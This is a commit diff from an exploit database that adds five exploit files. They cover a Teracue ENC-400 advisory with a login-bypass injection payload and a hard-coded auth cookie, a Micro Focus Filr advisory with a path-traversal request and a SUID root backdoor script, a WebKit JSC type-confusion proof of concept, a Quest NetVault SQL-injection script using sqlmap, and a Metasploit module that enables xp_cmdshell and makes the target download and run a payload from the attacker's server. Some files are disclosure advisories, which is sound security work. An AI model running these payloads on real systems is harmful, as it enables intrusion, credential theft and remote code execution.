DB: 2019-02-23
5 changes to exploits/shellcodes WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit) Quest NetVault Backup Server < 11.4.5 - Process Manager Service SQL Injection / Remote Code Execution Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation Teracue ENC-400 - Command Injection / Missing Authentication
This commit is contained in:
parent
f7381cfe15
commit
e2ed64fffa
6 changed files with 668 additions and 0 deletions
118
exploits/hardware/webapps/46451.txt
Normal file
118
exploits/hardware/webapps/46451.txt
Normal file
|
@ -0,0 +1,118 @@
|
|||
Introduction
|
||||
============
|
||||
|
||||
Multiple vulnerabilities were identified within the Teracue ENC-400,
|
||||
including pre-authenticated remote code authentication. While the vendor
|
||||
has released updated firmware after these issues were identified, they are
|
||||
not all resolved with the latest version of the firmware.
|
||||
|
||||
Product
|
||||
=======
|
||||
|
||||
The Teracue ENC-400 is accessible over an HTTP interface, which allows
|
||||
device configuration (including setting passwords or video stream
|
||||
destinations and servers). The vendor describes the device as follows:
|
||||
This HD/SD H.264 fanless video encoder is able to deliver multiple streams
|
||||
in multiple bitrates and protocols to multiple destinations. [1]
|
||||
|
||||
These issues affect firmware versions v2.56 or below.
|
||||
Note that the latest version of firmware, v2.57, does not adequately
|
||||
resolve all identified issues. Specific notes have been added to issues in
|
||||
the Technical Details section.
|
||||
|
||||
|
||||
Technical Details
|
||||
=================
|
||||
|
||||
1) Command injection in login form
|
||||
----------------------------------
|
||||
CVE-2018-20218
|
||||
|
||||
The login form passes user input directly to a shell command without any
|
||||
kind of escaping or validation.
|
||||
In the file /usr/share/www/check.lp:
|
||||
#!/usr/bin/env cgilua.cgi
|
||||
<%
|
||||
local pass = cgilua.POST.password
|
||||
local com1 = os.execute("echo \'"..cgilua.POST.password.."\' | (su -c
|
||||
/bin/true)")
|
||||
|
||||
An attacker is able to perform command injection using the "password"
|
||||
parameter displayed on the login form. An example "password" to bypass this
|
||||
authentication would be:
|
||||
f' > /dev/null #
|
||||
|
||||
It is also possible for an attacker to simply execute code directly on the
|
||||
server.
|
||||
|
||||
* Resolution Status *
|
||||
While this instance of remote code execution has been resolved, the
|
||||
resolution does not protect the entire codebase.
|
||||
In /usr/share/www/web/system_password.lp:
|
||||
local oldpass = cgilua.POST.oldpass
|
||||
local newpass = cgilua.POST.newpass
|
||||
local com1=os.execute("echo '"..oldpass.."' | (su -c 'echo '"..oldpass.."'
|
||||
| (su root -c '/bin/true') > /dev/null 2>&1 ; echo $?')")
|
||||
|
||||
This allows an authenticated user to execute commands without knowing the
|
||||
existing password. This is particularly important given the insufficient
|
||||
resolution of CVE-2018-20219 (issue 2).
|
||||
|
||||
2) Hard-coded authentication token
|
||||
----------------------------------
|
||||
CVE-2018-20219
|
||||
|
||||
After successful authentication, the device sends an authentication cookie
|
||||
to the end user such that they can access the devices web administration
|
||||
panel. This token is hardcoded to a string in the source code.
|
||||
In the file /usr/share/www/check.lp:
|
||||
|
||||
cookies.sethtml("AuthByPasswdENC400","Teracue:dGFpOfrtmR1bW1thrf5dGV4nhyxxdA==",{path='/'})
|
||||
|
||||
(Note: Line may be slightly different in different firmware versions,
|
||||
though the token is still the same).
|
||||
|
||||
By simply setting this cookie in a browser, an attacker is able to maintain
|
||||
access to every ENC-400 device without knowing the password. Even if a user
|
||||
changes the password on the device, this token is static and unchanged.
|
||||
This results in an authentication bypass.
|
||||
|
||||
* Resolution Status *
|
||||
While this cookie is now dynamically generated, the latest code generates
|
||||
cookie values from the current time in seconds.
|
||||
In the file /usr/share/www/check.lp:
|
||||
math.randomseed(os.time())
|
||||
local cookie_value=RandomVariable(30)
|
||||
|
||||
An attacker is able to trivially bypass authentication simply by knowing
|
||||
the approximate time of the last successful authentication.
|
||||
|
||||
2) Missing authentication on sensitive endpoints
|
||||
---------------------------------------------------------------------------------
|
||||
CVE-2018-20220
|
||||
|
||||
While the web interface requires authentication before it can be interacted
|
||||
with, a large portion of the HTTP endpoints are missing authentication.
|
||||
The "/configuration.xml" file, for example, includes all information
|
||||
required to access a video stream, such as the IP and port information, and
|
||||
any encryption information if specified.
|
||||
|
||||
* Resolution Status *
|
||||
No verification was performed as to whether this issue was appropriately
|
||||
resolved, or whether other files may be left unprotected.
|
||||
|
||||
|
||||
Disclosure Timeline
|
||||
===================
|
||||
|
||||
Attempts to contact vendor begin: August 30, 2018
|
||||
Vendor contacted: September 7, 2018
|
||||
Vendor acknowledges issues: October 23, 2018
|
||||
Initial fixes released for testing: December 4, 2018
|
||||
Response indicating insufficient fixes: December 4, 2018
|
||||
Public firmware release: February 13, 2019
|
||||
|
||||
References
|
||||
==========
|
||||
|
||||
[1] https://www.teracue.com/en/iptv-products/encoding
|
298
exploits/linux/webapps/46450.txt
Normal file
298
exploits/linux/webapps/46450.txt
Normal file
|
@ -0,0 +1,298 @@
|
|||
SecureAuth - SecureAuth Labs Advisory
|
||||
http://www.secureauth.com/
|
||||
|
||||
Micro Focus Filr Multiple Vulnerabilities
|
||||
|
||||
1. *Advisory Information*
|
||||
|
||||
Title: Micro Focus Filr Multiple Vulnerabilities
|
||||
Advisory ID: SAUTH-2019-0001
|
||||
Advisory URL: https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities
|
||||
Date published: 2019-02-20
|
||||
Date of last update: 2019-02-20
|
||||
Vendors contacted: Micro Focus
|
||||
Release mode: Coordinated release
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Path traversal [CWE-22], Permissions, Privileges, and Access
|
||||
Control [CWE-264]
|
||||
Impact: Security bypass, Information leak
|
||||
Remotely Exploitable: Yes
|
||||
Locally Exploitable: Yes
|
||||
CVE Name: CVE-2019-3474, CVE-2019-3475
|
||||
|
||||
3. *Vulnerability Description*
|
||||
|
||||
Novell (now part of Micro Focus [1]) website states that:
|
||||
Micro Focus Filr [2] provides file access and sharing, and lets users
|
||||
access their home directories and network folders from desktops, mobile
|
||||
devices, and the Web. Users can also synchronize their files to their PC
|
||||
or Mac. Changes that they make to downloaded copies are kept in sync
|
||||
with the originals on their network file servers. And finally, users can
|
||||
also share files internally and externally, and those with the share can
|
||||
collaborate with each other by commenting on the files.
|
||||
|
||||
A vulnerability was found in the Micro Focus Filr Appliance, which would
|
||||
allow an attacker with regular user access to read arbitrary files of
|
||||
the filesystem. Furthermore, a vulnerability in the famtd daemon could
|
||||
allow a local attacker to elevate privileges.
|
||||
|
||||
4. *Vulnerable Packages*
|
||||
|
||||
. Micro Focus Filr 3.4.0.217.
|
||||
. Older versions are probably affected too, but they were not checked.
|
||||
|
||||
5. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
Micro Focus released Filr 3.0 Security Update 6 that addresses the
|
||||
reported issues: https://download.novell.com/Download?buildid=nZUCSDkvpxk~
|
||||
|
||||
Also, Micro Focus published the following Security Notes:
|
||||
|
||||
. https://support.microfocus.com/kb/doc.php?id=7023726
|
||||
. https://support.microfocus.com/kb/doc.php?id=7023727
|
||||
|
||||
6. *Credits*
|
||||
|
||||
These vulnerabilities were discovered and researched by Matias Choren
|
||||
from SecureAuth. The publication of this advisory was coordinated by
|
||||
Leandro Cuozzo from SecureAuth Advisories Team.
|
||||
|
||||
7. *Technical Description / Proof of Concept Code*
|
||||
|
||||
7.1. *Path Traversal*
|
||||
|
||||
[CVE-2019-3474]
|
||||
The 'filename' parameter of the '/ssf/f/viewFile' endpoint is vulnerable
|
||||
to Path Traversal attacks. An authenticated, low-privileged user may be
|
||||
able to abuse this functionality in order to read arbitrary files on the
|
||||
filesystem.
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
|
||||
1. As an authenticated user, upload a sample PDF file in the 'My Files'
|
||||
section.
|
||||
2. After the upload finishes, click on the small arrow next to the file
|
||||
-> 'View Details'.
|
||||
3. The browser will issue a few requests to the web application, one of
|
||||
them being the one used for displaying the thumbnail of the file we've
|
||||
just uploaded. This request has the following structure:
|
||||
|
||||
/-----
|
||||
GET
|
||||
/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=t154758084657912375035546628304890001.jpg
|
||||
-----/
|
||||
|
||||
4. If the 'viewType' parameter is set to 'image', as in this case, we
|
||||
can escape the current directory and include arbitrary files, as long as
|
||||
they are readable by the 'wwwrun' user (the user Apache Tomcat is
|
||||
currently running as). For example, we could read the '/etc/passwd' file:
|
||||
|
||||
/-----
|
||||
GET
|
||||
/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=../../../../../../../../../../../etc/passwd
|
||||
HTTP/1.1
|
||||
Host: 10.2.45.32:8443
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
|
||||
Firefox/60.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531
|
||||
Connection: close
|
||||
-----/
|
||||
|
||||
/-----
|
||||
HTTP/1.1 200 OK
|
||||
Expires: Thu, 01 Jan 1970 00:00:00 GMT
|
||||
X-UA-Compatible: IE=Edge
|
||||
X-Content-Type-Options: nosniff
|
||||
Cache-Control: no-cache
|
||||
Strict-Transport-Security: max-age=0
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
X-XSS-Protection: 1; mode=block
|
||||
Content-Type: image/jpeg
|
||||
Date: Mon, 21 Jan 2019 14:53:37 GMT
|
||||
Connection: close
|
||||
Server: Filr
|
||||
Content-Length: 1506
|
||||
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
bin:x:1:1:bin:/bin:/bin/bash
|
||||
|
||||
<...>
|
||||
-----/
|
||||
|
||||
5. Also, an interesting file to look for would be
|
||||
'/vastorage/conf/vaconfig.zip'. This zip file contains a bunch of
|
||||
different configuration files, including 'mysql-liquibase.properties'
|
||||
which, among other things, defines connection parameters such as the
|
||||
username and password (base64 encoded) for the MySQL database:
|
||||
|
||||
/-----
|
||||
referencePassword==?UTF-8?B?Zmlscg==?=
|
||||
referenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
|
||||
url=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
|
||||
password==?UTF-8?B?Zmlscg==?=
|
||||
driver=com.mysql.jdbc.Driver
|
||||
referenceUsername=filr
|
||||
referenceDriver=com.mysql.jdbc.Driver
|
||||
username=filr
|
||||
-----/
|
||||
|
||||
7.2. *Local Privilege Escalation*
|
||||
|
||||
[CVE-2019-3475]
|
||||
As per the description: 'novell-famtd provide CIFS & NCP file access
|
||||
support for Filr server to request and respond to HTTP request coming
|
||||
from Filr Client/ Browser'. This daemon runs during startup and can be
|
||||
abused to elevate privileges on a Filr appliance.
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
1. The 'famtd' binary located at '/opt/novell/filr/bin/' and its
|
||||
containing folder are owned by the 'wwwrun' user, as can be seen next:
|
||||
|
||||
/-----
|
||||
wwwrun@filr:/opt/novell/filr/bin> ls -lha
|
||||
total 196K
|
||||
drwxr-x--- 2 wwwrun www 4,0K ene 21 17:22 .
|
||||
drwxr-x--- 8 wwwrun www 4,0K ene 14 18:41 ..
|
||||
-rwxr-x--- 1 wwwrun www 23K feb 8 2017 famtconfig
|
||||
-rwxr-x--- 1 wwwrun www 117K ene 14 18:19 famtd
|
||||
-rwxr-x--- 1 wwwrun www 905 feb 8 2017 famt_log_config.sh
|
||||
-rwxr-x--- 1 wwwrun www 31K jun 21 2018 kablink-teaming-tools.jar
|
||||
wwwrun@filr:/opt/novell/filr/bin>
|
||||
-----/
|
||||
|
||||
2. This binary is referenced and later executed in the
|
||||
'/etc/init.d/novell-famtd' init script, meaning that it will run with
|
||||
root privileges on startup:
|
||||
|
||||
/-----
|
||||
#
|
||||
# /etc/init.d/novell-famtd
|
||||
#
|
||||
|
||||
<...>
|
||||
|
||||
# Check for missing binaries (stale symlinks should not happen)
|
||||
# Note: Special treatment of stop for LSB conformance
|
||||
FAMT_BIN=/opt/novell/filr/bin/famtd
|
||||
|
||||
<...>
|
||||
|
||||
## Start daemon with startproc(8). If this fails
|
||||
## the return value is set appropriately by startproc.
|
||||
ulimit -c unlimited
|
||||
/sbin/startproc $FAMT_BIN
|
||||
|
||||
<...>
|
||||
-----/
|
||||
|
||||
3. If an attacker manages to run arbitrary commands on the Filr
|
||||
appliance as the 'wwwrun' user, they could replace the
|
||||
'/opt/novell/filr/bin/famtd' binary with, for example, a custom bash
|
||||
script that writes a SUID backdoor on the filesystem:
|
||||
|
||||
/-----
|
||||
#!/bin/bash
|
||||
|
||||
# C snippet for setting group and user identity to 'root'
|
||||
FILE="/tmp/exp.c"
|
||||
|
||||
/bin/cat <<EOM >$FILE
|
||||
#include <unistd.h>
|
||||
|
||||
int main(void) {
|
||||
setgid(0);
|
||||
setuid(0);
|
||||
setegid(0);
|
||||
execl("/bin/bash", "bash", 0);
|
||||
}
|
||||
EOM
|
||||
|
||||
# Compile it
|
||||
gcc /tmp/exp.c -o /tmp/exp
|
||||
|
||||
# Set suid bit
|
||||
chmod -c 4755 /tmp/exp
|
||||
|
||||
# Call the original famtd daemon
|
||||
/opt/novell/filr/bin/famtd.back
|
||||
-----/
|
||||
|
||||
4. After a server reboot, we can run '/tmp/exp' and get root privileges
|
||||
on the server:
|
||||
|
||||
/-----
|
||||
wwwrun@filr:/tmp> id
|
||||
uid=30(wwwrun) gid=8(www) groups=8(www)
|
||||
wwwrun@filr:/tmp> ls -lha
|
||||
total 96K
|
||||
drwxrwxrwt 18 root root 4,0K ene 21 17:15 .
|
||||
drwxr-xr-x 27 root root 4,0K ene 21 14:14 ..
|
||||
|
||||
<...>
|
||||
|
||||
-rwsr-xr-x 1 root root 12K ene 21 17:14 exp
|
||||
-rw-r--r-- 1 root root 137 ene 21 14:14 exp.c
|
||||
|
||||
<...>
|
||||
|
||||
wwwrun@filr:/tmp> ./exp
|
||||
filr:/tmp # id
|
||||
uid=0(root) gid=0(root) groups=0(root),8(www)
|
||||
filr:/tmp #
|
||||
-----/
|
||||
|
||||
8. *Report Timeline*
|
||||
2019-01-23: SecureAuth sent an initial notification to Micro Focus including a draft advisory.
|
||||
2019-01-23: Micro Focus acknowledged reception of initial contact.
|
||||
2019-01-24: Micro Focus confirmed the reported vulnerabilities and
|
||||
informed that they were aiming to deliver a patch around mid February.
|
||||
2019-01-23: SecureAuth thanks the reply.
|
||||
2019-02-11: SecureAuth asked for an update.
|
||||
2019-02-11: Micro Focus replied saying that they were expecting to release the patch by the end of the week.
|
||||
2019-02-11: SecureAuth proposed to set the publication date for next week.
|
||||
2019-02-13: Micro Focus confirmed February 20th as the release date.
|
||||
2019-02-20: Advisory SAUTH-2019-0001 published.
|
||||
|
||||
9. *References*
|
||||
|
||||
[1] https://www.microfocus.com/novell/
|
||||
[2] https://www.novell.com/documentation/filr-3/filr-overvw/data/what_is_filr.html
|
||||
|
||||
10. *About SecureAuth Labs*
|
||||
|
||||
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
|
||||
with anticipating the future needs and requirements for information
|
||||
security technologies. We conduct research in several important areas of
|
||||
computer security, including identity-related attacks, system
|
||||
vulnerabilities and cyber-attack planning. Research includes problem
|
||||
formalization, identification of vulnerabilities, novel solutions and
|
||||
prototypes for new technologies. We regularly publish security
|
||||
advisories, primary research, technical publications, research blogs,
|
||||
project information, and shared software tools for public use at
|
||||
http://www.secureauth.com.
|
||||
|
||||
11. *About SecureAuth*
|
||||
|
||||
SecureAuth is leveraged by leading companies, their employees, their
|
||||
customers and their partners to eliminate identity-related breaches.
|
||||
As a leader in access management, SecureAuth is powering an identity
|
||||
security revolution by enabling people and devices to intelligently
|
||||
and adaptively access systems and data, while effectively keeping bad
|
||||
actors from doing harm. By ensuring the continuous assessment of risk
|
||||
and enablement of trust, SecureAuth's highly flexible platform makes
|
||||
it easier for organizations to prevent the misuse of credentials. To
|
||||
learn more, visit www.secureauth.com, call (949) 777-6959,
|
||||
or email us at info@secureauth.com
|
||||
|
||||
12. *Disclaimer*
|
||||
|
||||
The contents of this advisory are copyright (c) 2019 SecureAuth, and are
|
||||
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
|
||||
3.0 (United States) License:
|
62
exploits/multiple/dos/46448.js
Normal file
62
exploits/multiple/dos/46448.js
Normal file
|
@ -0,0 +1,62 @@
|
|||
/*
|
||||
https://github.com/WebKit/webkit/blob/3fff8c40c665a09de5e3ede46fc35908f69353c3/Source/JavaScriptCore/runtime/Lookup.h#L392
|
||||
|
||||
if (value.attributes() & PropertyAttribute::PropertyCallback) {
|
||||
JSValue result = value.lazyPropertyCallback()(vm, &thisObj);
|
||||
thisObj.putDirect(vm, propertyName, result, attributesForStructure(value.attributes()));
|
||||
return;
|
||||
}
|
||||
|
||||
if (value.attributes() & PropertyAttribute::DOMJITAttribute) {
|
||||
ASSERT_WITH_MESSAGE(classInfo, "DOMJITAttribute should have class info for type checking.");
|
||||
const DOMJIT::GetterSetter* domJIT = value.domJIT();
|
||||
auto* customGetterSetter = DOMAttributeGetterSetter::create(vm, domJIT->getter(), value.propertyPutter(), DOMAttributeAnnotation { classInfo, domJIT });
|
||||
thisObj.putDirectCustomAccessor(vm, propertyName, customGetterSetter, attributesForStructure(value.attributes()));
|
||||
return;
|
||||
}
|
||||
|
||||
if (value.attributes() & PropertyAttribute::DOMAttribute) {
|
||||
ASSERT_WITH_MESSAGE(classInfo, "DOMAttribute should have class info for type checking.");
|
||||
auto* customGetterSetter = DOMAttributeGetterSetter::create(vm, value.propertyGetter(), value.propertyPutter(), DOMAttributeAnnotation { classInfo, nullptr });
|
||||
thisObj.putDirectCustomAccessor(vm, propertyName, customGetterSetter, attributesForStructure(value.attributes()));
|
||||
return;
|
||||
}
|
||||
|
||||
CustomGetterSetter* customGetterSetter = CustomGetterSetter::create(vm, value.propertyGetter(), value.propertyPutter());
|
||||
thisObj.putDirectCustomAccessor(vm, propertyName, customGetterSetter, attributesForStructure(value.attributes()));
|
||||
|
||||
It's possible that the given property's attributes variable "value.attributes()" doesn't contain PropertyAttribute::CustomAccessor. In that case, a mismatch between the value of the property and its attributes occurs. When handling a property access operation, the normal interpreter sees the type of the value whereas the JIT compiler sees the attributes. So we can use JITed code to pull out the CustomGetterSetter object to the JavaScript world. The PoC demonstrates type confusion and an OOB read using a CustomGetterSetter object linked to regExpConstructorInput.
|
||||
|
||||
PoC:
|
||||
*/
|
||||
|
||||
function opt(o) {
|
||||
return o.r.input;
|
||||
}
|
||||
|
||||
Object.assign({}, RegExp); // Reifying
|
||||
|
||||
for (let i = 0; i < 200000; i++) {
|
||||
opt({r: RegExp});
|
||||
}
|
||||
|
||||
let input = opt({r: RegExp}); // Pulling the CustomGetterSetter object.
|
||||
|
||||
let o = {
|
||||
a0: 0x1234,
|
||||
a1: 0x1234,
|
||||
a2: 0x1234,
|
||||
a3: 0x1234,
|
||||
a4: 0x1234,
|
||||
a5: 0x1234,
|
||||
a6: 0x1234,
|
||||
a7: 0x1234,
|
||||
a8: 0x1234,
|
||||
a9: 0x1234,
|
||||
a10: 0x1234,
|
||||
a11: 0x1234,
|
||||
}
|
||||
|
||||
o.input = input;
|
||||
|
||||
print(o.input); // The normal interpreter doesn't see the attributes, so it will just call the underneath getter using callCustomGetter.
|
50
exploits/multiple/webapps/46446.txt
Normal file
50
exploits/multiple/webapps/46446.txt
Normal file
|
@ -0,0 +1,50 @@
|
|||
# Exploit Title: Quest NetVault Backup Server < 11.4.5 Process Manager Service SQL Injection Remote Code Execution Vulnerability (ZDI-17-982)
|
||||
# Date: 2-21-2019
|
||||
# Exploit Author: credit goes to rgod for finding the bug
|
||||
# Version: Quest NetVault Backup Server < 11.4.5
|
||||
# CVE : CVE-2017-17417
|
||||
|
||||
# There is a decent description of the bug here: https://www.zerodayinitiative.com/advisories/ZDI-17-982/
|
||||
# but no PoC, hence this submission. Also the description states that authentication is not required.
|
||||
# I did not find the auth bypass, but the target was using default credz
|
||||
# of admin and a blank password.
|
||||
#
|
||||
# "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
|
||||
# of Quest NetVault Backup. Authentication is not required to exploit this vulnerability.
|
||||
#
|
||||
# The specific flaw exists within the handling of NVBUPhaseStatus Acknowledge method requests.
|
||||
# The issue results from the lack of proper validation of a
|
||||
# user-supplied string before using it to construct SQL queries. An attacker can leverage this
|
||||
# vulnerability to execute code in the context of the underlying database."
|
||||
|
||||
|
||||
|
||||
# Fill out the variables then copy paste everything below this line into a kali terminal
|
||||
|
||||
#target ip address
|
||||
target=x.x.x.x
|
||||
|
||||
#target port
|
||||
port=8443
|
||||
|
||||
#username
|
||||
username=admin
|
||||
|
||||
#password is blank by default!
|
||||
password=
|
||||
cookie=$(curl -i -s -k -X $'POST' -H $'Content-Length: 109' -H $'Content-Type: application/json-rpc; charset=UTF-8' --data-binary "{\"jsonrpc\":\"2.0\",\"method\":\"Logon\",\"params\":{\"OutputFormat\":\"pretty\",\"UserName\":\"$username\",\"Password\":\"$password\"},\"id\":1}" "https://$target:$port/query" | grep SessionCookie | cut -d '"' -f4)
|
||||
cat > dellSqlmap <<EOF
|
||||
POST /query HTTP/1.1
|
||||
Host: $target:$port
|
||||
Connection: close
|
||||
Content-Length: 129
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
X-Requested-With: XMLHttpRequest
|
||||
SessionCookie: $cookie
|
||||
Content-Type: application/json-rpc; charset=UTF-8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
{"jsonrpc":"2.0","method":"GET","params":{"classname":"NVBUPhaseStatus","updates":"none","where":"1=1*"},"id":1}
|
||||
EOF
|
||||
sqlmap -r dellSqlmap --force-ssl --level=5 --dbms=postgresql --prefix='' --suffix='' --test-filter='AND boolean-based blind - WHERE or HAVING clause' --batch
|
135
exploits/windows/remote/46449.rb
Executable file
135
exploits/windows/remote/46449.rb
Executable file
|
@ -0,0 +1,135 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::Remote::Nuuo
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi',
|
||||
'Description' => %q{
|
||||
The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
|
||||
This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
|
||||
installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
|
||||
This module will either use a provided session number (which can be guessed with an auxiliary
|
||||
module) or attempt to login using a provided username and password - it will also try the
|
||||
default credentials if nothing is provided.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2018-18982' ],
|
||||
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
|
||||
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
|
||||
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Nuuo Central Management Server <= v2.10.0', {} ],
|
||||
],
|
||||
'Notes' =>
|
||||
{
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK ]
|
||||
},
|
||||
'Privileged' => false, # we run as NETWORK_SERVICE
|
||||
'DisclosureDate' => 'Oct 11 2018',
|
||||
'DefaultTarget' => 0))
|
||||
register_options [
|
||||
Opt::RPORT(5180),
|
||||
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
|
||||
OptString.new('URIPATH', [true, 'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
|
||||
]
|
||||
end
|
||||
|
||||
|
||||
def inject_sql(sql, final = false)
|
||||
sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
|
||||
if final
|
||||
nucs_send_msg_async(sql)
|
||||
else
|
||||
nucs_send_msg(sql)
|
||||
end
|
||||
end
|
||||
|
||||
# Handle incoming requests from the server
|
||||
def on_request_uri(cli, request)
|
||||
unless @pl
|
||||
print_error("A request came in, but the payload wasn't ready yet!")
|
||||
return
|
||||
end
|
||||
print_good('Sending the payload to CMS...')
|
||||
send_response(cli, @pl)
|
||||
|
||||
Rex.sleep(3)
|
||||
|
||||
print_status('Executing shell...')
|
||||
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
|
||||
register_file_for_cleanup("c:/windows/temp/#{@filename}")
|
||||
end
|
||||
|
||||
def create_hex_cmd(cmd)
|
||||
var = rand_text_alpha(2)
|
||||
hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
|
||||
cmd.each_byte { |b|
|
||||
hex_cmd << b.to_i.to_s(16)
|
||||
}
|
||||
hex_cmd << "; exec (@#{var})"
|
||||
end
|
||||
|
||||
def primer
|
||||
# we need to roll our own here instead of using the MSSQL mixins
|
||||
# (tried that and it doesn't work)
|
||||
service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
|
||||
print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
|
||||
@filename = "#{rand_text_alpha_lower(8..10)}.exe"
|
||||
ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
|
||||
download_pl = %{xp_cmdshell }
|
||||
download_pl << %{'cd C:\\windows\\temp\\ && }
|
||||
download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
|
||||
download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
|
||||
download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
|
||||
download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
|
||||
download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}
|
||||
|
||||
print_status('Injecting PowerShell payload')
|
||||
inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
|
||||
register_file_for_cleanup("c:/windows/temp/#{ps1}")
|
||||
end
|
||||
|
||||
def exploit
|
||||
nucs_login
|
||||
|
||||
unless @nucs_session
|
||||
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
|
||||
end
|
||||
|
||||
@pl = generate_payload_exe
|
||||
|
||||
#do not use SSL
|
||||
if datastore['SSL']
|
||||
ssl_restore = true
|
||||
datastore['SSL'] = false
|
||||
end
|
||||
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) {super}
|
||||
rescue Timeout::Error
|
||||
datastore['SSL'] = true if ssl_restore
|
||||
end
|
||||
end
|
||||
end
|
|
@ -6334,6 +6334,7 @@ id,file,description,date,author,type,platform,port
|
|||
46442,exploits/windows/dos/46442.py,"Virtual VCR Max .0a - '.vcr' Buffer Overflow (PoC)",2019-02-21,"Wade Guest",dos,windows,
|
||||
46443,exploits/android/dos/46443.py,"ScreenStream 3.0.15 - Denial of Service",2019-02-21,s4vitar,dos,android,
|
||||
46445,exploits/android/dos/46445.c,"AirDrop 2.0 - Denial of Service (DoS)",2019-02-21,s4vitar,dos,android,
|
||||
46448,exploits/multiple/dos/46448.js,"WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter",2019-02-22,"Google Security Research",dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -17211,6 +17212,7 @@ id,file,description,date,author,type,platform,port
|
|||
46392,exploits/windows/remote/46392.txt,"mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution",2019-02-18,ProofOfCalc,remote,windows,
|
||||
46436,exploits/hardware/remote/46436.rb,"Belkin Wemo UPnP - Remote Code Execution (Metasploit)",2019-02-20,Metasploit,remote,hardware,
|
||||
46444,exploits/hardware/remote/46444.txt,"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass",2019-02-21,"Jacob Baines",remote,hardware,
|
||||
46449,exploits/windows/remote/46449.rb,"Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)",2019-02-22,Metasploit,remote,windows,5180
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
